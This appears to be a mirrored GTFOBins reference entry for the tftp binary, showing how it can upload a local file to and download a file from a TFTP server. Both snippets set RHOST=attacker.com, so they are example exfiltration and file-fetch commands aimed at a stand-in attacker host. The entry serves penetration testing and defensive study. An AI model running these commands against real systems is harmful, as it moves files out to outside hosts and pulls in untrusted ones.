mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
16 lines
324 B
Markdown
16 lines
324 B
Markdown
---
|
|
functions:
|
|
upload:
|
|
- description: Send local file to a TFTP server.
|
|
code: |
|
|
RHOST=attacker.com
|
|
tftp $RHOST
|
|
put file_to_send
|
|
download:
|
|
- description: Fetch a remote file from a TFTP server.
|
|
code: |
|
|
RHOST=attacker.com
|
|
tftp $RHOST
|
|
get file_to_get
|
|
---
|